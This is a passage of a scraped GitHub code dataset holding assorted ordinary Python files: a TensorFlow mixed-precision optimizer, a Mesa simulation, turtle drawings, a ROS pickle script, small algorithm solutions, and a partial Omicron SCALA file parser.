request.method == 'POST':\n event_dates = request.POST.get('event_dates')\n print(event_dates) \n return HttpResponse(\"success\")","repo_name":"JashKakadiya/event_management_","sub_path":"event_management_application/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":18485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2492469613","text":"#!/usr/bin/env python3\nimport os\n\ndepth = 9\nrlist = list(range(depth))\n\nren = {}\nfor i in rlist:\n ren[i] = {}\n\nfor f in os.listdir('.'):\n if '.log.' in f:\n p = f.split('.')\n ip = int(p[-1])\n if 1 <= ip < depth:\n ren[ip][f] = '{}.log.{}'.format(p[0], ip+1)\n elif f.endswith('.log'):\n ren[0][f] = '{}.1'.format(f)\n\nprint(ren)\n\nfor i in reversed(rlist):\n for old, new in ren[i].items():\n os.rename(old, new)","repo_name":"rohe/oidctest","sub_path":"test_tool/cp/test_op/tool/rotate_logs.py","file_name":"rotate_logs.py","file_ext":"py","file_size_in_byte":462,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"67"} +{"seq_id":"11640500633","text":"from model import GameTheoryModel\nfrom mesa.visualization.modules import CanvasGrid, ChartModule\nfrom mesa.visualization.ModularVisualization import ModularServer\n\nGLOBAL_WIDTH = 10\nGLOBAL_HEIGHT = 10\n\n\ndef agent_portrayal(agent):\n portrayal = {\"Filled\": \"true\",\n \"Layer\": 1}\n\n if agent.type == \"AlwaysShare\":\n portrayal[\"Color\"] = \"green\"\n portrayal[\"r\"] = 0.8\n portrayal[\"Shape\"] = \"circle\"\n elif agent.type == \"AlwaysSteal\":\n portrayal[\"Color\"] = \"red\"\n portrayal[\"r\"] = 0.8\n portrayal[\"Shape\"] = \"circle\"\n elif agent.type == \"Food\":\n portrayal[\"Shape\"] = \"rect\"\n portrayal[\"w\"] = 1\n portrayal[\"h\"] = 1\n portrayal[\"Layer\"] = 0\n\n if agent.fully_grown:\n portrayal[\"Color\"] = \"orange\"\n else:\n portrayal[\"Color\"] = \"black\"\n\n return portrayal\n\n\ngrid = CanvasGrid(agent_portrayal, GLOBAL_WIDTH, GLOBAL_HEIGHT, 300, 300)\nchart = ChartModule([{\"Label\": \"Ratio of Share vs Steal\",\n \"Color\": \"Black\"}],\n data_collector_name='datacollector')\nserver = ModularServer(GameTheoryModel,\n [grid, chart],\n \"Game Theory Sim\",\n {\"n_share\": 15,\n \"n_steal\": 15,\n \"n_food\": 50,\n \"width\": GLOBAL_WIDTH, \"height\": GLOBAL_HEIGHT})\n\nserver.port = 8521\nserver.launch()\n","repo_name":"MrHaiss/GameTheorySim","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"11020162277","text":"import six\n\nimport tensorflow as tf\n\n\nclass MixedPrecisionOptimizerWrapper(tf.train.Optimizer):\n def __init__(self, optimizer, loss_scale=None):\n super(MixedPrecisionOptimizerWrapper, self).__init__(\n optimizer._use_locking,\n optimizer._name + '-MP',\n )\n self._optimizer = optimizer\n self._fp32_to_fp16 = {}\n self._loss_scaler = None\n if loss_scale is None:\n self._loss_scale = 1.0\n elif isinstance(loss_scale, float):\n self._loss_scale = loss_scale\n elif isinstance(loss_scale, AutomaticLossScaler):\n self._loss_scaler = loss_scale\n self._loss_scale = self._loss_scaler.loss_scale\n\n def compute_gradients(self, loss, var_list=None,\n gate_gradients=tf.train.Optimizer.GATE_OP,\n aggregation_method=None,\n colocate_gradients_with_ops=False,\n grad_loss=None):\n loss *= self._loss_scale\n grads_and_vars_fp16 = self._optimizer.compute_gradients(\n loss, var_list=var_list,\n 
gate_gradients=gate_gradients,\n aggregation_method=aggregation_method,\n colocate_gradients_with_ops=colocate_gradients_with_ops,\n grad_loss=grad_loss,\n )\n\n # collecting regularization functions\n reg_var_funcs = tf.get_collection('REGULARIZATION_FUNCTIONS')\n reg_funcs = dict(map(lambda x: (x[0].name, x[1]), reg_var_funcs))\n\n # creating FP-32 variables and filling the fp32 dict\n grads_and_vars_fp32 = []\n with tf.variable_scope('FP32-master-copy'):\n for grad, var in grads_and_vars_fp16:\n if var.dtype.base_dtype == tf.float16:\n fp32_var = tf.Variable(\n initial_value=tf.cast(var.initialized_value(), tf.float32),\n name=var.name.split(':')[0],\n expected_shape=var.shape,\n dtype=tf.float32,\n trainable=False,\n # necessary for cudnn_rnn layers which have unknown shape\n validate_shape=bool(var.get_shape()),\n collections=[tf.GraphKeys.GLOBAL_VARIABLES,\n \"FP32_MASTER_COPIES\"],\n )\n self._fp32_to_fp16[fp32_var.name] = var\n fp32_grad = tf.cast(grad, tf.float32)\n # adding regularization part with respect to fp32 copy\n if var.name in reg_funcs:\n fp32_grad += self._loss_scale * tf.gradients(\n # pylint: disable=no-member\n tf.contrib.layers.apply_regularization(\n reg_funcs[var.name],\n [fp32_var],\n ),\n fp32_var,\n )[0]\n grads_and_vars_fp32.append((fp32_grad, fp32_var))\n else:\n grads_and_vars_fp32.append((grad, var))\n\n grads_and_vars_fp32 = _scale_grads(grads_and_vars_fp32,\n 1.0 / self._loss_scale)\n return grads_and_vars_fp32\n\n def apply_gradients(self, grads_and_vars, global_step=None, name=None):\n def apply_ops_wrapper():\n update_op = self._optimizer.apply_gradients(grads_and_vars,\n global_step, name)\n apply_ops = []\n with tf.control_dependencies([update_op]):\n for grad, var in grads_and_vars:\n if var.name in self._fp32_to_fp16:\n dst_var = self._fp32_to_fp16[var.name]\n apply_ops.append(\n tf.assign(dst_var, tf.saturate_cast(var, tf.float16))\n )\n if apply_ops:\n return tf.group(apply_ops)\n return update_op\n\n if self._loss_scaler:\n grad_has_nans, grad_amax = AutomaticLossScaler.check_grads(grads_and_vars)\n should_skip_update = tf.logical_or(tf.is_inf(grad_amax), grad_has_nans)\n loss_scale_update_op = self._loss_scaler.update_op(grad_has_nans,\n grad_amax)\n with tf.control_dependencies([loss_scale_update_op]):\n return tf.cond(should_skip_update, tf.no_op, apply_ops_wrapper)\n else:\n return apply_ops_wrapper()\n\n\ndef _scale_grads(grads_and_vars, scale):\n scaled_grads_and_vars = []\n for grad, var in grads_and_vars:\n if grad is not None:\n if isinstance(grad, tf.IndexedSlices):\n grad_values = grad.values * scale\n grad = tf.IndexedSlices(grad_values, grad.indices, grad.dense_shape)\n else:\n grad *= scale\n scaled_grads_and_vars.append((grad, var))\n return scaled_grads_and_vars\n\n\nclass AutomaticLossScaler(object):\n SUPPORTED_ALGOS = ['backoff', 'logmax']\n\n def __init__(self, algorithm='Backoff', params=None):\n algorithm = algorithm.lower().strip()\n if algorithm == 'backoff':\n self.scaler = BackoffScaler(params)\n elif algorithm == 'logmax':\n self.scaler = LogMaxScaler(params) # ppf(.999)\n else:\n raise ValueError('Unknown scaling algorithm: {}'.format(algorithm))\n\n def update_op(self, has_nan, amax):\n return self.scaler.update_op(has_nan, amax)\n\n @property\n def loss_scale(self):\n return self.scaler.loss_scale\n\n @staticmethod\n def check_grads(grads_and_vars):\n has_nan_ops = []\n amax_ops = []\n\n for grad, _ in grads_and_vars:\n if grad is not None:\n if isinstance(grad, tf.IndexedSlices):\n x = grad.values\n else:\n x = 
grad\n\n has_nan_ops.append(tf.reduce_any(tf.is_nan(x)))\n amax_ops.append(tf.reduce_max(tf.abs(x)))\n\n has_nan = tf.reduce_any(has_nan_ops)\n amax = tf.reduce_max(amax_ops)\n return has_nan, amax\n\n\nclass BackoffScaler(object):\n def __init__(self, params):\n if params is None:\n params = {}\n self.scale_min = params.get('scale_min', 1.0)\n self.scale_max = params.get('scale_max', 2.**24)\n self.step_factor = params.get('step_factor', 2.0)\n self.step_window = params.get('step_window', 2000)\n\n self.iteration = tf.Variable(initial_value=0,\n trainable=False,\n dtype=tf.int64)\n self.last_overflow_iteration = tf.Variable(initial_value=-1,\n trainable=False,\n dtype=tf.int64)\n self.scale = tf.Variable(initial_value=self.scale_max,\n trainable=False)\n\n def update_op(self, has_nan, amax):\n def overflow_case():\n new_scale_val = tf.clip_by_value(self.scale / self.step_factor,\n self.scale_min, self.scale_max)\n scale_assign = tf.assign(self.scale, new_scale_val)\n overflow_iter_assign = tf.assign(self.last_overflow_iteration,\n self.iteration)\n with tf.control_dependencies([scale_assign, overflow_iter_assign]):\n return tf.identity(self.scale)\n\n def scale_case():\n since_overflow = self.iteration - self.last_overflow_iteration\n should_update = tf.equal(since_overflow % self.step_window, 0)\n def scale_update_fn():\n new_scale_val = tf.clip_by_value(self.scale * self.step_factor,\n self.scale_min, self.scale_max)\n return tf.assign(self.scale, new_scale_val)\n return tf.cond(should_update,\n scale_update_fn,\n lambda: self.scale)\n\n iter_update = tf.assign_add(self.iteration, 1)\n overflow = tf.logical_or(has_nan, tf.is_inf(amax))\n\n update_op = tf.cond(overflow,\n overflow_case,\n scale_case)\n with tf.control_dependencies([update_op]):\n return tf.identity(iter_update)\n\n @property\n def loss_scale(self):\n return self.scale\n\n\nclass LogMaxScaler(object):\n def __init__(self, params):\n if params is None:\n params = {}\n self.scale_min = params.get('scale_min', 1.0)\n self.scale_max = params.get('scale_max', 2.**24)\n self.log_max = params.get('log_max', 16.)\n self.beta1 = params.get('beta1', 0.99)\n self.beta2 = params.get('beta2', 0.999)\n self.overflow_std_dev = params.get('overflow_std_dev', 3.09)\n\n self.iteration = tf.Variable(initial_value=0,\n trainable=False,\n dtype=tf.int64)\n self.scale = tf.Variable(initial_value=1.0,\n trainable=False)\n self.x_hat = tf.Variable(initial_value=0,\n trainable=False,\n dtype=tf.float32)\n self.slow_x_hat = tf.Variable(initial_value=0,\n trainable=False,\n dtype=tf.float32)\n self.xsquared_hat = tf.Variable(initial_value=0,\n trainable=False,\n dtype=tf.float32)\n self.b1_correction = tf.Variable(initial_value=1.,\n trainable=False,\n dtype=tf.float32)\n self.b2_correction = tf.Variable(initial_value=1.,\n trainable=False,\n dtype=tf.float32)\n\n # NB: assumes that `amax` is already has been downscaled\n def update_op(self, has_nan, amax):\n is_nonfinite = tf.logical_or(has_nan, tf.is_inf(amax))\n x = tf.cond(is_nonfinite,\n lambda: tf.pow(2., self.log_max),\n lambda: tf.log(amax) / tf.log(tf.constant(2.)))\n\n x_hat_assn = tf.assign(self.x_hat, self.beta1 * self.x_hat +\n (1 - self.beta1) * x)\n b1_corr_assn = tf.assign(self.b1_correction,\n self.b1_correction * self.beta1)\n with tf.control_dependencies([x_hat_assn, b1_corr_assn]):\n mu = self.x_hat.read_value() / (1 - self.b1_correction.read_value())\n\n slow_x_hat_assn = tf.assign(self.slow_x_hat, self.beta2 * self.slow_x_hat +\n (1 - self.beta2) * x)\n xsquared_hat_assn = 
tf.assign(\n self.xsquared_hat,\n self.beta2 * self.xsquared_hat + (1 - self.beta2) * (x * x),\n )\n b2_corr_assn = tf.assign(self.b2_correction,\n self.b2_correction * self.beta2)\n with tf.control_dependencies([slow_x_hat_assn, xsquared_hat_assn,\n b2_corr_assn]):\n e_xsquared = self.xsquared_hat.read_value() / \\\n (1 - self.b2_correction.read_value())\n slow_mu = self.slow_x_hat.read_value() / \\\n (1 - self.b2_correction.read_value())\n\n sigma2 = e_xsquared - (slow_mu * slow_mu)\n sigma = tf.sqrt(tf.maximum(sigma2, tf.constant(0.)))\n\n log_cutoff = sigma * self.overflow_std_dev + mu\n log_difference = 16 - log_cutoff\n proposed_scale = tf.pow(2., log_difference)\n scale_update = tf.assign(\n self.scale,\n tf.clip_by_value(proposed_scale, self.scale_min, self.scale_max),\n )\n iter_update = tf.assign_add(self.iteration, 1)\n\n with tf.control_dependencies([scale_update]):\n return tf.identity(iter_update)\n\n @property\n def loss_scale(self):\n return self.scale\n\n\n# The following function(s) are not under the NVIDIA license:\n\ndef get_loss_scale_from_params(params):\n \"\"\"Returns the loss scale argument from user parameters.\n\n Args:\n params: A dictionary containing the user parameters.\n\n Returns:\n A value that can be passed to the\n :class:`opennmt.optimizers.mixed_precision_wrapper.MixedPrecisionOptimizerWrapper`\n :obj:`loss_scale` constructor argument.\n \"\"\"\n loss_scale = params.get(\"loss_scale\")\n if loss_scale is None:\n return AutomaticLossScaler()\n if not isinstance(loss_scale, six.string_types):\n return loss_scale\n return AutomaticLossScaler(\n algorithm=loss_scale, params=params.get(\"loss_scale_params\"))\n","repo_name":"iriscxy/VMSMO","sub_path":"opennmt/optimizers/mixed_precision_wrapper.py","file_name":"mixed_precision_wrapper.py","file_ext":"py","file_size_in_byte":11676,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"67"} +{"seq_id":"18118426819","text":"#!/bin/python3\n\nimport numpy as np\n\n\ndef fuel(mass):\n\n '''Returns the necessary fuel to launch a module. 
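The required fuel comes straight from the formula below: floor(mass / 3) - 2, applied element-wise when mass is a NumPy array. Doctest-style illustration (values follow directly from the formula; the exact float repr may vary across NumPy versions):\n    >>> fuel(14)\n    2.0\n    >>> fuel(1969)\n    654.0\n    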
'''\n\n fuel = np.floor(mass/3) - 2\n\n return fuel\n \n\nif __name__ == '__main__':\n\n # open input file and create list\n with open('input.txt') as f:\n flist = f.read().splitlines() \n modules = [int(bar) for bar in flist]\n\n # compute the amount of fuel required (result) \n total_fuel = fuel(np.array(modules))\n result = np.sum(total_fuel)\n\n # write result to output file\n with open(\"output.txt\", \"a\") as out:\n out.write(str(result))\n\n\n","repo_name":"anacamargos11/AdventOfCode","sub_path":"Day1/Part1/day1_part1.py","file_name":"day1_part1.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72573701654","text":"#!/usr/bin/env python\n\nimport rospy\nimport pickle\nfrom ar_track_alvar_msgs.msg import AlvarMarkers, AlvarMarker\n\n\nFLAG = 1\n\ndef wait_for_time():\n \"\"\"Wait for simulated time to begin.\n \"\"\"\n while rospy.Time().now().to_sec() == 0:\n pass\n\n\ndef callback(msg):\n markers = msg.markers\n for marker in markers:\n if marker.id == 1 and FLAG:\n filename = \"ar_1_pose\"\n outfile = open(filename, 'wb')\n pickle.dump(marker, outfile)\n outfile.close()\n print(\"SAVE\")\n# infile = open(filename, 'rb')\n# obj = pickle.load(infile)\n# infile.close()\n\ndef main():\n rospy.init_node('resave')\n wait_for_time()\n filename = \"/home/dell/catkin_ws/src/fetch-picker/final_pick_and_place/data/ar_1_pose\"\n infile = open(filename, 'rb')\n obj = pickle.load(infile)\n infile.close()\n print(obj)\n outfile = open(\"/home/dell/catkin_ws/src/fetch-picker/final_pick_and_place/data/ar_2_pose\", 'wb')\n pickle.dump(obj, outfile, 2)\n outfile.close()\n rospy.spin()\n\nif __name__ == '__main__':\n main()\n","repo_name":"QueenieOhYeah/Fetch_pick_and_place","sub_path":"final_pick_and_place/scripts/resave.py","file_name":"resave.py","file_ext":"py","file_size_in_byte":1107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"37436613257","text":"from django.contrib import admin\nfrom django.urls import path\nfrom .import views\n\nurlpatterns = [\n path('', views.all_collectables, name='collectables'),\n path('/',\n views.collectable_detail, name='collectable_detail'),\n path('add/', views.add_collectable, name='add_collectable'),\n path('sell_collectable/', views.sell_collectable, name='sell_collectable'),\n path('edit//',\n views.edit_collectable, name='edit_collectable'),\n path('delete//',\n views.delete_collectable, name='delete_collectable'),\n path('reviews/', views.reviews, name='reviews'),\n]\n","repo_name":"Lornavav/retro-revolution","sub_path":"products/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4043074381","text":"# Load the Keras NN from the h5 and json config files\n# Open the file with uproot\nimport os,sys\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"-1\"\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras.models import model_from_json\nimport numpy as np\nimport uproot\nimport csv\n\narchitecture_filepath = \"models/architecture_same_filters.json\"\nweights_filepath = \"models/weights_same_filters.h5\"\nscale_filepath = \"models/scaling_parameters_same_filters_3tags_only.csv\"\ndata_filepath = \"user.jagrundy.20736236._000001.MiniNTuple.root\" \n\n# First, read the csv to get the offsets and scales for each input\noffset = 
{\"pt\":[],\"eta\":[],\"phi\":[]}\nscale = {\"pt\":[],\"eta\":[],\"phi\":[]}\nwith open(scale_filepath) as csvfile:\n scale_reader = csv.reader(csvfile,delimiter=\",\")\n row_count=0\n for row in scale_reader:\n if row_count < 4:\n row_count+=1\n continue\n offset[\"pt\"].append(-float(row[0])) \n offset[\"eta\"].append(-float(row[2])) \n offset[\"phi\"].append(-float(row[4])) \n scale[\"pt\"].append(1/np.sqrt(float(row[1])))\n scale[\"eta\"].append(1/np.sqrt(float(row[3])))\n scale[\"phi\"].append(1/np.sqrt(float(row[5])))\n\n# Horribly inefficient, but whatever, it's meant to be a quick check\nevents = uproot.open(data_filepath)[\"XhhMiniNtuple\"]\nnn_inputs = []\nevent_count=0\nfor pts,etas,phis,tags in zip(events.array(\"resolvedJets_pt\"), \\\n events.array(\"resolvedJets_eta\"), \\\n events.array(\"resolvedJets_phi\"), \\\n events.array(\"resolvedJets_is_DL1r_FixedCutBEff_77\")):\n # Only consider 3-tag events\n if sum(tags) != 3:\n continue\n # Loop over all the untagged jets in the event, up to 7, and save the scaled pt,eta,phi\n event_pts,event_etas,event_phis = [],[],[]\n notag_i = 0\n for i in range(len(tags)):\n if not tags[i]:\n event_pts.append( (pts[i] +offset[\"pt\"][notag_i]) *scale[\"pt\"][notag_i] )\n event_etas.append( (etas[i]+offset[\"eta\"][notag_i])*scale[\"eta\"][notag_i] )\n event_phis.append( (phis[i]+offset[\"phi\"][notag_i])*scale[\"phi\"][notag_i] )\n notag_i += 1\n if notag_i == 7: \n break\n # If we ended up with less than 7 jets, do zero-padding\n while notag_i < 7:\n event_pts.append(offset[\"pt\"][notag_i]*scale[\"pt\"][notag_i])\n event_etas.append(offset[\"eta\"][notag_i]*scale[\"eta\"][notag_i])\n event_phis.append(offset[\"phi\"][notag_i]*scale[\"phi\"][notag_i])\n notag_i += 1\n nn_inputs.append(np.array(event_pts+event_etas+event_phis))\n # Only do the first few events for testing\n if event_count == 3:\n break\n event_count+=1\nnn_inputs = np.array(nn_inputs) # Has to be numpy array, not list\n\n# Load and run the model\nmodel = model_from_json(open(architecture_filepath,'r').read())\nmodel.load_weights(weights_filepath)\nscores = model.predict(nn_inputs)\n\nfor i in range(len(nn_inputs)):\n print(\"Event\",i)\n print(\"Inputs\",nn_inputs[i])\n print(\"Outputs\")\n for j in range(len(scores[i])):\n print(\" \",j,round(scores[i][j],4))\n print(\"\")\n","repo_name":"callum-mccracken/bbb","sub_path":"todd_comparison/todd.py","file_name":"todd.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"30466446797","text":"# IMPORTING THE MODULE TURTLE\nimport turtle\n\n# SETTING UP THE SCREEN\nscreen = turtle.Screen()\nscreen.bgcolor('black')\n# SETTING UP TURTLE 1.0\nsally = turtle.Turtle()\nsally.color('white')\n\nsally.speed(10)\n\n# LOOP THAT REPEATS 180 TIMES\nfor i in range(180):\n sally.forward(100)\n sally.right(30)\n sally.forward(20)\n sally.left(60)\n sally.forward(50)\n sally.right(30)\n \n sally.penup()\n sally.setposition(0, 0)\n sally.pendown()\n \n sally.right(2)\n \n# AFTER THE LOOP REPEATS 180 TIMES, THE TURTLE STOPS AND HIDES\nturtle.done()\nsally.hideturtle()\n# DOING THE BORDER\npin = turtle.Turtle()\npin.color('white')\n\npin.penup()\npin.goto(-170, 170)\n\npin.speed(10)\npin.pendown()\n\nfor i in range(9):\n for i in range(40):\n pin.forward(20)\n pin.left(170)\n \n pin.penup()\n pin.left(38)\n pin.forward(40)\n pin.pendown()\n\nturtle.done()\npin.hideturtle()\n# THIS WAS FOR THE SECOND SET OF BORDERS\nsue = 
turtle.Turtle()\nsue.color('white')\nsue.penup()\nsue.goto(170, 170)\nsue.forward(5)\nsue.right(90)\nsue.forward(40)\n\nsue.speed(10)\nsue.pendown()\n\nfor i in range(7):\n for i in range(40):\n sue.forward(20)\n sue.left(170)\n \n sue.penup()\n sue.left(38)\n sue.forward(40)\n sue.pendown()\n\nsue.penup()\nsue.right(60)\nsue.forward(5)\nsue.pendown()\n\nfor i in range(40):\n sue.forward(20)\n sue.left(170)\n\nturtle.done()\nsue.hideturtle()\n#THIS IS FOR THIRD SET OF BORDERS\nbee = turtle.Turtle()\nbee.color('white')\nbee.penup()\nbee.goto(170, -170)\nbee.forward(5)\nbee.right(180)\nbee.forward(40)\n\nbee.speed(10)\nbee.pendown()\n\nfor i in range(8):\n for i in range(40):\n bee.forward(20)\n bee.left(170)\n \n bee.penup()\n bee.left(38)\n bee.forward(40)\n bee.pendown()\n \nturtle.done()\nbee.hideturtle()\n# IT'S THE LAST PART OF THE BORDER\nbob = turtle.Turtle()\nbob.color('white')\nbob.penup()\nbob.goto( -170, -170)\nbob.forward(5)\nbob.left(90)\nbob.forward(40)\n\nbob.speed(10)\nbob.pendown()\n\nfor i in range(7):\n for i in range(40):\n bob.forward(20)\n bob.left(170)\n \n bob.penup()\n bob.left(38)\n bob.forward(40)\n bob.pendown()\n \nturtle.done()\nbob.hideturtle()\n","repo_name":"leopardshade123/turtle-designs","sub_path":"bob.py","file_name":"bob.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"21483156833","text":"# -*- coding: utf-8 -*-\n\"\"\"\n Python supports multiple inheritance.\n super().__init__() follows the MRO chain upward step by step, ensuring each class in the chain is initialized only once.\n\n GrandSon init start\n Son1 init start\n Son2 init start\n Parent init start\n Parent init end\n Son2 init end\n Son1 init end\n GrandSon init end\n (<class '__main__.GrandSon'>, <class '__main__.Son1'>, <class '__main__.Son2'>, <class '__main__.Parent'>, <class 'object'>)\n\n\"\"\"\n\n\nclass Parent(object):\n def __init__(self, name, *args, **kwargs):\n print(\"Parent init start\")\n self.name = name\n print(\"Parent init end\")\n\n\nclass Son1(Parent):\n def __init__(self, name, sex, *args, **kwargs):\n print(\"Son1 init start\")\n super().__init__(name, *args, **kwargs)\n self.sex = sex\n print(\"Son1 init end\")\n\n\nclass Son2(Parent):\n def __init__(self, name, age, *args, **kwargs):\n print(\"Son2 init start\")\n super().__init__(name, *args, **kwargs)\n self.age = age\n print(\"Son2 init end\")\n\n\nclass GrandSon(Son1, Son2):\n def __init__(self, name, age, sex, *args, **kwargs):\n print(\"GrandSon init start\")\n super().__init__(name, age, sex, *args, **kwargs)\n print(\"GrandSon init end\")\n\n\nif __name__ == '__main__':\n gs = GrandSon(\"lily\", 18, \"woman\", \"China\")\n print(GrandSon.__mro__)\n","repo_name":"huanmengmie/python_study","sub_path":"base_test/extend/second.py","file_name":"second.py","file_ext":"py","file_size_in_byte":1374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"72824148054","text":"from collections import deque\r\n\r\n\r\ndef bfs(x, y):\r\n visited = [[False] * M for __ in range(N)]\r\n safe[x][y] = 0\r\n visited[x][y] = True\r\n q = deque([(x, y, 0)])\r\n while q:\r\n qx, qy, c = q.popleft()\r\n for dx, dy in D:\r\n nx = qx + dx\r\n ny = qy + dy\r\n if 0 <= nx < N and 0 <= ny < M:\r\n if not visited[nx][ny]:\r\n safe[nx][ny] = min(safe[nx][ny], c + 1)\r\n visited[nx][ny] = True\r\n q.append((nx, ny, c + 1))\r\n\r\n\r\nD = [(1, 0), (0, 1), (1, 1), (-1, 0), (0, -1), (-1, -1), (1, -1), (-1, 1)]\r\nN, M = map(int, input().split())\r\nshark = [[*map(int, input().split())] for __ in range(N)]\r\nsafe = [[int(1e9)] * M for __ in range(N)]\r\n\r\nfor i in range(N):\r\n for 
j in range(M):\r\n if shark[i][j] == 1:\r\n bfs(i, j)\r\n\r\nprint(max(map(max, safe)))\r\n","repo_name":"itsmo1031/problem-solving","sub_path":"백준/Silver/17086. 아기 상어 2/아기 상어 2.py","file_name":"아기 상어 2.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15690432675","text":"# 获取协程的返回值\nimport asyncio\nfrom functools import partial\n\nasync def get_html(url):\n print(\"start get url\")\n await asyncio.sleep(2)\n return \"bobby\"\n\n\ndef callback(url, future):\n print(url)\n print(\"send email to bobby\")\n print(future)\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop() # 事件循环,可以往里面注册协程\n # future = asyncio.ensure_future(get_html(\"http://www.imooc.com\")) # 将协程注册到loop中\n task = loop.create_task(get_html(\"http://www.imooc.com\")) # 将协程注册到loop中\n task.add_done_callback(partial(callback, \"http://www.imooc.com\"))\n # loop.run_until_complete(future)\n loop.run_until_complete(task)\n\n print(task.result())\n","repo_name":"zelinhehe/myPythonTest","sub_path":"AdvancePython-master/chapter13/loop_test2.py","file_name":"loop_test2.py","file_ext":"py","file_size_in_byte":735,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"28494084997","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def partition(self, head: Optional[ListNode], x: int) -> Optional[ListNode]:\n left_dummy = curr_left = ListNode()\n right_dummy = curr_right = ListNode()\n curr = head\n \n while curr != None:\n if curr.val >= x:\n curr_right.next = ListNode(curr.val)\n curr_right = curr_right.next\n else:\n curr_left.next = ListNode(curr.val)\n curr_left = curr_left.next\n curr = curr.next\n curr_left.next = right_dummy.next\n return left_dummy.next\n \n ","repo_name":"fasil729/Comptetive-Programming-A2SV","sub_path":"0086-partition-list/0086-partition-list.py","file_name":"0086-partition-list.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"20616134858","text":"\"\"\"The main SCALA class that represents an Omicron SCALA file.\n\"\"\"\n\nimport numpy as np\nimport os\n\nclass OMICRONscala:\n \"\"\"This is the main class that represents an Omicron SCALA file\n \n Args:\n filepath: the name of the .par file to be opened\n \"\"\"\n\n def __init__(self,\n filepath):\n \"\"\"Load data and metadata relative to the given .par file\n \n Args:\n filepath: path to the .par file.\n \n Returns: metadata as dictionary and data as numpy array\n \n \"\"\"\n\n self._filepath = filepath\n self._path = os.path.dirname(filepath)\n\n self._meta = self._loadMeta()\n self._data = self._loadData()\n\n self._channels = self._addChannels()\n\n def __getitem__(self, index):\n return self._channels[index]\n\n def _loadMeta(self):\n \"\"\"Load metadata from .par file into a dictionary\n \n Returns: dictionary of metadata\n \n \"\"\"\n\n # Open .par file and load content\n with open(self._filepath) as f:\n meta = f.readlines()\n\n # Remove newline character and whitespaces\n meta = [e.strip() for e in meta]\n meta = [e.replace(' ','') for e in meta]\n\n # Remove final comment part\n meta = [e.split(';',1)[0] for e in meta]\n\n # Remove empty lines\n meta = [e for e in meta if e not in ('', ';')]\n\n # Add key to channel parameters, for each channel\n self._chlist = 
list()\n self._imglist = list()\n self._speclist = list()\n self._SpecParameter = ''\n\n for i,e in enumerate(meta):\n if 'TopographicChannel' in e:\n chName = meta[i+8][-3:].upper()+\"_\"\n meta[i] = chName+meta[i]\n meta[i+1] = chName+'Direction:'+meta[i+1]\n meta[i+2] = chName+'MinimumRawValue:'+meta[i+2]\n meta[i+3] = chName+'MaximumRawValue:'+meta[i+3]\n meta[i+4] = chName+'MinimumPhysValue:'+meta[i+4]\n meta[i+5] = chName+'MaximumPhysValue:'+meta[i+5]\n meta[i+6] = chName+'Resolution:'+meta[i+6]\n meta[i+7] = chName+'PhysicalUnit:'+meta[i+7]\n meta[i+8] = chName+'Filename:'+meta[i+8]\n meta[i+9] = chName+'DisplayName:'+meta[i+9]\n\n self._chlist.append(chName)\n self._imglist.append(chName)\n\n elif 'SpectroscopyChannel' in e:\n chName = meta[i+16][-3:].upper()+\"_\"\n meta[i] = chName+meta[i]\n self._SpecParameter = meta[i+1]\n meta[i+1] = chName+'Parameter:'+meta[i+1]\n meta[i+2] = chName+'Direction:'+meta[i+2]\n meta[i+3] = chName+'MinimumRawValue:'+meta[i+3]\n meta[i+4] = chName+'MaximumRawValue:'+meta[i+4]\n meta[i+5] = chName+'MinimumPhysValue:'+meta[i+5]\n meta[i+6] = chName+'MaximumPhysValue:'+meta[i+6]\n meta[i+7] = chName+'Resolution:'+meta[i+7]\n meta[i+8] = chName+'PhysicalUnit:'+meta[i+8]\n meta[i+9] = chName+'NumberSpecPoints:'+meta[i+9]\n meta[i+10] = chName+'StartPoint:'+meta[i+10]\n meta[i+11] = chName+'EndPoint:'+meta[i+11]\n meta[i+12] = chName+'Increment:'+meta[i+12]\n meta[i+13] = chName+'AcqTimePerPoint:'+meta[i+13]\n meta[i+14] = chName+'DelayTimePerPoint:'+meta[i+14]\n meta[i+15] = chName+'Feedback:'+meta[i+15]\n meta[i+16] = chName+'Filename:'+meta[i+16]\n meta[i+17] = chName+'DisplayName:'+meta[i+17]\n\n self._chlist.append(chName)\n self._speclist.append(chName)\n\n elif self._SpecParameter+'Parameter' in e:\n meta[i] = 'SpecParam:'+self._SpecParameter\n meta[i+1] = 'SpecParamRampSpeedEnabled:'+meta[i+1]\n meta[i+2] = 'SpecParamT1us:'+meta[i+2]\n meta[i+3] = 'SpecParamT2us:'+meta[i+3]\n meta[i+4] = 'SpecParamT3us:'+meta[i+4]\n meta[i+5] = 